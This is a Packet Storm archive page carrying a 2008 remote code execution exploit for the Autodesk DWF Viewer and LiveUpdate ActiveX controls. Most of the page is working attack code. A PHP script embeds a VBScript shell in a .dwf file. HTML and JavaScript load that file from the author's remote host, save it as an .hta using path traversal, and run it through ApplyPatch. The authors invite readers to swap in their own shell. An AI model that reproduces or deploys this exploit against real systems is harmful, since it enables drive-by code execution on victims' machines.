exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

autodesk-exec.txt

autodesk-exec.txt
Posted Oct 1, 2008
Authored by Nine:Situations:Group | Site retrogod.altervista.org

Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit.

tags | exploit, remote, code execution
SHA-256 | f1029b67056a7d3e358536ea18aa53b67251312416070495e9e07a1cc44ac85b

autodesk-exec.txt

Change Mirror Download
<!-- 
Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit
by Nine:Situations:Group::bruiser
site: http://retrogod.altervista.org/
tested against IE6

tested software: Revit Architecture 2009 sp2
Autodesk Design Review 2009 (which also comes with Revit)


dll settings (both):
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
KillBitSet: False

The first vulnerability is caused due to the CExpressViewerControl class
(AdView.dll v9.0.0.96) which provide the insecure SaveAS() method
which allows to store locally files with arbitrary extension.
The second one is related to the ApplyPatch() one inside the UpdateEngine
class (LiveUpdate16.DLL, 17.2.56 ??... this is a shared one) which allows to launch an arbitrary
executable by the second argument. Note, that the first one, alone, allows
arbitrary code execution. The impact of the second one is limited if you cannot
specify command arguments or launch a file of yours.

The embedded dwf file (located at the url http://retrogod.altervista.org/suntzu.dwf)
has been created modifying an existing one, replacing a .png resource file with
a vbscript shell through the following script (note the PCLZIP_OPT_NO_COMPRESSION flag,
this has been used to preserve the code, note also the dwg files are
essentially zips) :

<?php
//library:
//http://www.phpconcept.net/pclzip/index.en.php#download
include_once('pclzip.lib.php');

$archive = new PclZip('suntzu.dwf');

//modify path
$list = $archive->add("com.autodesk.dwf.ePlot_CD186DAA4322089243B140AD3ACE11B7\\A84650EE-74A7-4766-8D0C-CC9EAE8313D3.png", PCLZIP_OPT_NO_COMPRESSION);

if ($list == 0) {
echo "ERROR : ".$archive->errorInfo(true);
}
?>

take a look to suntzu.dwf with an hex-editor...
This exploit launch calc.exe but you can embed your own vbscript shell
and extended shell commands, by using the php code given.
-->
<HTML>
<OBJECT CLASSID="clsid:A662DA7E-CCB7-4743-B71A-D817F6D575DF"
WIDTH="640" HEIGHT="480"
id='CExpressViewerControl' >
<PARAM NAME="Src"
VALUE="http://retrogod.altervista.org/suntzu.dwf">
</OBJECT>
<OBJECT CLASSID='clsid:89EC7921-729B-4116-A819-DF86A4A5776B'
id='UpdateEngine' />
</OBJECT>
<script type="text/javascript">
<!--
strPatchFile = "..\\..\\..\\..\\..\\..\\..\\suntzu.hta";

try
{
CExpressViewerControl.SaveAS (strPatchFile);
}
catch(e)
{
document.write("impossible to save suntzu.hta ...");
}
finally
{
}
strProductCode="whatever" ;

try
{
UpdateEngine.ApplyPatch (strProductCode , strPatchFile);
}
catch(e)
{
document.write("impossible to execute suntzu.hta ...");
}
finally
{
}

-->
</script>


original advisory: http://retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close